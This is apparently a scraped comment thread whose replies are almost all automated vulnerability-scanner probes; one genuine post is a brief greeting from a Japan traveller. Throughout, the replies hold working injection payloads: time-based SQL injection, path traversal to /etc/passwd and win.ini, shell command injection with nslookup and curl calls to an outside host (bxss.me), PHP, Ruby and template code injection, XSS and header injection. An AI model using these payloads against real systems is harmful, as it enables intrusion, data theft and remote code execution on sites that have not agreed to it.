'+response.write(9218000*9257740)+'
re: Justeat
"+response.write(9218000*9257740)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
${9999274+10000200}
re: Justeat
../
re: Justeat
)
re: Justeat
!(()&&!|*|*|
re: Justeat
redirtest.acx
re: Justeat
^(#$!@#$)(()))******
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Justeat
echo oxaxrp$()\ twnqdz\nz^xyu||a #' &echo oxaxrp$()\ twnqdz\nz^xyu||a #|" &echo oxaxrp$()\ twnqdz\nz^xyu||a #
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Justeat
&echo ymkoba$()\ sshtkh\nz^xyu||a #' &echo ymkoba$()\ sshtkh\nz^xyu||a #|" &echo ymkoba$()\ sshtkh\nz^xyu||a #
re: Justeat
/etc/shells
re: Justeat
'.gethostbyname(lc('hitoz'.'ziwvpfjz585b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(66).chr(111).chr(84).'
re: Justeat
|echo kerfld$()\ uxskyj\nz^xyu||a #' |echo kerfld$()\ uxskyj\nz^xyu||a #|" |echo kerfld$()\ uxskyj\nz^xyu||a #
re: Justeat
../../../../../../../../../../../../../../etc/shells
re: Justeat
".gethostbyname(lc("hitsq"."rqnphtludd58c.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(75).chr(98).chr(85)."
re: Justeat
expr 9000462648 - 954967
re: Justeat
c:/windows/win.ini
re: Justeat
gethostbyname(lc('hitvc'.'xhblzmlt573ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(72).chr(117).chr(72)
re: Justeat
(nslookup -q=cname hitxcrjswxqknc00ea.bxss.me||curl hitxcrjswxqknc00ea.bxss.me))
re: Justeat
bxss.me
re: Justeat
$(nslookup -q=cname hitawycleywyaa5c57.bxss.me||curl hitawycleywyaa5c57.bxss.me)
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
&nslookup -q=cname hityhqsurtasz8fa89.bxss.me&'\"`0&nslookup -q=cname hityhqsurtasz8fa89.bxss.me&`'
re: Justeat
http://bxss.me/t/fit.txt?.jpg
re: Justeat
&(nslookup -q=cname hitzvidowiymzf89bb.bxss.me||curl hitzvidowiymzf89bb.bxss.me)&'\"`0&(nslookup -q=cname hitzvidowiymzf89bb.bxss.me||curl hitzvidowiymzf89bb.bxss.me)&`'
re: Justeat
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Justeat
|(nslookup -q=cname hityzdvhypxbra55c6.bxss.me||curl hityzdvhypxbra55c6.bxss.me)
re: Justeat
`(nslookup -q=cname hitcrbbpeoswg25f56.bxss.me||curl hitcrbbpeoswg25f56.bxss.me)`
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
;(nslookup -q=cname hitrzxgonaonee7d81.bxss.me||curl hitrzxgonaonee7d81.bxss.me)|(nslookup -q=cname hitrzxgonaonee7d81.bxss.me||curl hitrzxgonaonee7d81.bxss.me)&(nslookup -q=cname hitrzxgonaonee7d81.bxss.me||curl hitrzxgonaonee7d81.bxss.me)
re: Justeat
';print(md5(31337));$a='
re: Justeat
|(nslookup${IFS}-q${IFS}cname${IFS}hitktqvtmyaps84b9a.bxss.me||curl${IFS}hitktqvtmyaps84b9a.bxss.me)
re: Justeat
'"()
re: Justeat
";print(md5(31337));$a="
re: Justeat
&(nslookup${IFS}-q${IFS}cname${IFS}hittshtwricqc29819.bxss.me||curl${IFS}hittshtwricqc29819.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hittshtwricqc29819.bxss.me||curl${IFS}hittshtwricqc29819.bxss.me)&`'
re: Justeat
'&&sleep(27*1000)*chugdj&&'
re: Justeat
${@print(md5(31337))}
re: Justeat
"&&sleep(27*1000)*jrfxlk&&"
re: Justeat
${@print(md5(31337))}\
re: Justeat
'||sleep(27*1000)*kgehlj||'
re: Justeat
'.print(md5(31337)).'
re: Justeat
"||sleep(27*1000)*boqryh||"
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(122).concat(71).concat(108).concat(79)+(require"socket"
Socket.gethostbyname("hitpm"+"ejgdxtwj97db7.bxss.me.")[3].to_s)+"
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(102).concat(90)+(require'socket'
Socket.gethostbyname('hithu'+'gcczivigf5329.bxss.me.')[3].to_s)+'
re: Justeat
'A'.concat(70-3).concat(22*4).concat(99).concat(73).concat(109).concat(81)+(require'socket'
Socket.gethostbyname('hityl'+'jggwedkv1b1fb.bxss.me.')[3].to_s)
re: Justeat
replies
re: Justeat
replies�
re: Justeat
replies/.
re: Justeat
'"
re: Justeat
<!--
re: Justeat
'"()&%<zzz><ScRiPt >QnPv(9620)</ScRiPt>
re: Justeat
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitcsuonvenfxa4603.bxss.me")}}
re: Justeat
'"()&%<zzz><ScRiPt >QnPv(9004)</ScRiPt>
re: Justeat
9066472
re: Justeat
rAXoNYY9
re: Justeat
*1
re: Justeat
*1
re: Justeat
*1
re: Justeat
*1
re: Justeat
-1 OR 5*5=25 --
re: Justeat
-1 OR 5*5=26 --
re: Justeat
-1 OR 5*5=25
re: Justeat
-1 OR 5*5=26
re: Justeat
*if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
-1 waitfor delay '0:0:15' --
re: Justeat
ubYNTIe4'; waitfor delay '0:0:15' --
re: Justeat
-1 OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: Justeat
-1) OR 742=(SELECT 742 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 22=(SELECT 22 FROM PG_SLEEP(15))--
re: Justeat
cGzo7Rv5' OR 867=(SELECT 867 FROM PG_SLEEP(15))--
re: Justeat
3ViShKzC') OR 403=(SELECT 403 FROM PG_SLEEP(15))--
re: Justeat
4sjA2STO')) OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
'"
re: Justeat
@@gvZcc
re: Justeat
(select 198766*667891)
re: Justeat
(select 198766*667891 from DUAL)
Dropping by to say hi to everyone. I am not based in Japan but do make an effort to travel to Japan often enough to explore all corners and have good food. Glad to know all of you here, I have been lazy to write down my thoughts on my previous experiences but now I feel motivated to share more. Hopefully will get to meet some of you guys some day!
re: kanivour
aNTiO0Zm
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
-1 OR 2+403-403-1=0+0+0+1
re: kanivour
-1 OR 3+403-403-1=0+0+0+1
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
1 waitfor delay '0:0:15' --
re: kanivour
44erqQeN'; waitfor delay '0:0:15' --
re: kanivour
-5 OR 776=(SELECT 776 FROM PG_SLEEP(15))--
re: kanivour
-5) OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: kanivour
-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--
re: kanivour
z5i8zpYs' OR 529=(SELECT 529 FROM PG_SLEEP(15))--
re: kanivour
QSRI6O5F') OR 255=(SELECT 255 FROM PG_SLEEP(15))--
re: kanivour
G2Y6ftSc')) OR 754=(SELECT 754 FROM PG_SLEEP(15))--
re: kanivour
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
1'"
re: kanivour
@@VQpjy
re: kanivour
1Cep3RARecO
re: kanivour
response.write(9963411*9436725)
re: kanivour
'+response.write(9963411*9436725)+'
re: kanivour
"+response.write(9963411*9436725)+"
re: kanivour
%0abcc:074625.67-22267.67.20a7a.19990.2@bxss.me
re: kanivour
to@example.com>%0d%0abcc:074625.67-22268.67.20a7a.19990.2@bxss.me
re: kanivour
../../../../../../../../../../../../../../etc/passwd
re: kanivour
../../../../../../../../../../../../../../windows/win.ini
re: kanivour
file:///etc/passwd
re: kanivour
../../../../../../../../../../../../../../../proc/version
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kanivour
../../../../../../../../../../etc/passwd%00.jpg
re: kanivour
echo ioeqdi$()\ hbwxpj\nz^xyu||a #' &echo ioeqdi$()\ hbwxpj\nz^xyu||a #|" &echo ioeqdi$()\ hbwxpj\nz^xyu||a #
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kanivour
&echo cfdlui$()\ zbpahk\nz^xyu||a #' &echo cfdlui$()\ zbpahk\nz^xyu||a #|" &echo cfdlui$()\ zbpahk\nz^xyu||a #
re: kanivour
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kanivour
|echo dngupm$()\ cchjfm\nz^xyu||a #' |echo dngupm$()\ cchjfm\nz^xyu||a #|" |echo dngupm$()\ cchjfm\nz^xyu||a #
re: kanivour
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kanivour
(nslookup hitqphyjazaww84026.bxss.me||perl -e "gethostbyname('hitqphyjazaww84026.bxss.me')")
re: kanivour
/etc/passwd
re: kanivour
$(nslookup hitkmynftwetc6ff1f.bxss.me||perl -e "gethostbyname('hitkmynftwetc6ff1f.bxss.me')")
re: kanivour
%2fetc%2fpasswd
re: kanivour
<esi:include src="http://bxss.me/rpb.png"/>
re: kanivour
&nslookup hitzvmfjhnqlsea30b.bxss.me&'\"`0&nslookup hitzvmfjhnqlsea30b.bxss.me&`'
re: kanivour
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kanivour
&(nslookup hithtzincvtut5dd06.bxss.me||perl -e "gethostbyname('hithtzincvtut5dd06.bxss.me')")&'\"`0&(nslookup hithtzincvtut5dd06.bxss.me||perl -e "gethostbyname('hithtzincvtut5dd06.bxss.me')")&`'
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kanivour
|(nslookup hitdkwmypwldgaacbd.bxss.me||perl -e "gethostbyname('hitdkwmypwldgaacbd.bxss.me')")
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kanivour
${9999016+9999906}
re: kanivour
`(nslookup hithmsnxomjyse7d6d.bxss.me||perl -e "gethostbyname('hithmsnxomjyse7d6d.bxss.me')")`
re: kanivour
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kanivour
;(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")|(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")&(nslookup hitkzkmrmxnbsdbc52.bxss.me||perl -e "gethostbyname('hitkzkmrmxnbsdbc52.bxss.me')")
re: kanivour
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kanivour
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: kanivour
file:///etc/passwd
re: kanivour
/\../\../\../\../\../\../\../etc/passwd
re: kanivour
/WEB-INF/web.xml
re: kanivour
C:\WINDOWS\system32\drivers\etc\hosts
re: kanivour
../../../../../../../../../../windows/win.ini%00.jpg
re: kanivour
)
re: kanivour
/../../../../../../../../../../boot.ini
re: kanivour
!(()&&!|*|*|
re: kanivour
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kanivour
^(#$!@#$)(()))******
re: kanivour
..\..\..\..\..\..\..\..\windows\win.ini
re: kanivour
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kanivour
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kanivour
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kanivour
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kanivour
WEB-INF/web.xml
re: kanivour
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kanivour
WEB-INF\web.xml
re: kanivour
Http://bxss.me/t/fit.txt
re: kanivour
http://bxss.me/t/fit.txt%3F.jpg
re: kanivour
/etc/shells
re: kanivour
c:/windows/win.ini
re: kanivour
bxss.me
re: kanivour
'.gethostbyname(lc('hitbn'.'rirmaxml13a36.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(65).chr(105).chr(83).'
re: kanivour
".gethostbyname(lc("hitls"."sujcsddo725a8.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(74).chr(111).chr(73)."
re: kanivour
HttP://bxss.me/t/xss.html?%00
re: kanivour
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(103).concat(80)+(require"socket"
Socket.gethostbyname("hitun"+"kupmjewh83eea.bxss.me.")[3].to_s)+"
re: kanivour
bxss.me/t/xss.html?%00
re: kanivour
'+'A'.concat(70-3).concat(22*4).concat(97).concat(90).concat(101).concat(70)+(require'socket'
Socket.gethostbyname('hitmx'+'kqmkrtbs0e07b.bxss.me.')[3].to_s)+'
re: kanivour
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kanivour
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kanivour
';print(md5(31337));$a='
re: kanivour
";print(md5(31337));$a="
re: kanivour
${@print(md5(31337))}
re: kanivour
${@print(md5(31337))}\
re: kanivour
'"
re: kanivour
'.print(md5(31337)).'
re: kanivour
<!--
re: kanivour
1
re: kanivour
1
re: kanivour
-1 OR 2+309-309-1=0+0+0+1 --
re: kanivour
-1 OR 3+309-309-1=0+0+0+1 --
re: kanivour
-1 OR 2+777-777-1=0+0+0+1
re: kanivour
-1 OR 3+777-777-1=0+0+0+1
re: kanivour
-1' OR 2+473-473-1=0+0+0+1 --
re: kanivour
-1' OR 3+473-473-1=0+0+0+1 --
re: kanivour
-1' OR 2+714-714-1=0+0+0+1 or 'Ifbw3RAr'='
re: kanivour
-1' OR 3+714-714-1=0+0+0+1 or 'Ifbw3RAr'='
re: kanivour
-1" OR 2+455-455-1=0+0+0+1 --
re: kanivour
-1" OR 3+455-455-1=0+0+0+1 --
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
1BB8EZORCR0
re: kanivour
response.write(9182442*9009286)
re: kanivour
'+response.write(9182442*9009286)+'
re: kanivour
"+response.write(9182442*9009286)+"
re: kanivour
../../../../../../../../../../../../../../etc/passwd
re: kanivour
../../../../../../../../../../../../../../windows/win.ini
re: kanivour
<esi:include src="http://bxss.me/rpb.png"/>
re: kanivour
${9999675+9999023}
re: kanivour
file:///etc/passwd
re: kanivour
../
re: kanivour
)
re: kanivour
!(()&&!|*|*|
re: kanivour
^(#$!@#$)(()))******
re: kanivour
redirtest.acx
re: kanivour
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: kanivour
echo jpscrb$()\ knxqov\nz^xyu||a #' &echo jpscrb$()\ knxqov\nz^xyu||a #|" &echo jpscrb$()\ knxqov\nz^xyu||a #
re: kanivour
'.gethostbyname(lc('hitwp'.'iayholdd156a2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(82).chr(99).chr(84).'
re: kanivour
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: kanivour
&echo iqfixx$()\ geuxhi\nz^xyu||a #' &echo iqfixx$()\ geuxhi\nz^xyu||a #|" &echo iqfixx$()\ geuxhi\nz^xyu||a #
re: kanivour
".gethostbyname(lc("hitcm"."npkzhefsa8d88.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(81).chr(120).chr(65)."
re: kanivour
/etc/shells
re: kanivour
|echo mbazrh$()\ prtioh\nz^xyu||a #' |echo mbazrh$()\ prtioh\nz^xyu||a #|" |echo mbazrh$()\ prtioh\nz^xyu||a #
re: kanivour
gethostbyname(lc('hitab'.'yijgxjhpc4714.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(82).chr(115).chr(69)
re: kanivour
../../../../../../../../../../../../../../etc/shells
re: kanivour
expr 9000314899 - 978402
re: kanivour
c:/windows/win.ini
re: kanivour
(nslookup -q=cname hitlwojbzshcn5c7bc.bxss.me||curl hitlwojbzshcn5c7bc.bxss.me))
re: kanivour
bxss.me
re: kanivour
$(nslookup -q=cname hitgmynzyxzltd5b19.bxss.me||curl hitgmynzyxzltd5b19.bxss.me)
re: kanivour
Http://bxss.me/t/fit.txt
re: kanivour
&nslookup -q=cname hitdqibbpqwplebfdc.bxss.me&'\"`0&nslookup -q=cname hitdqibbpqwplebfdc.bxss.me&`'
re: kanivour
ctime
sleep
p0
(I30
tp1
Rp2
.
re: kanivour
http://bxss.me/t/fit.txt?.jpg
re: kanivour
&(nslookup -q=cname hitdkcvaidxvle11cf.bxss.me||curl hitdkcvaidxvle11cf.bxss.me)&'\"`0&(nslookup -q=cname hitdkcvaidxvle11cf.bxss.me||curl hitdkcvaidxvle11cf.bxss.me)&`'
re: kanivour
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kanivour
|(nslookup -q=cname hitnebhpulubq034f2.bxss.me||curl hitnebhpulubq034f2.bxss.me)
re: kanivour
';print(md5(31337));$a='
re: kanivour
`(nslookup -q=cname hitrehklnwtuva3cf6.bxss.me||curl hitrehklnwtuva3cf6.bxss.me)`
re: kanivour
";print(md5(31337));$a="
re: kanivour
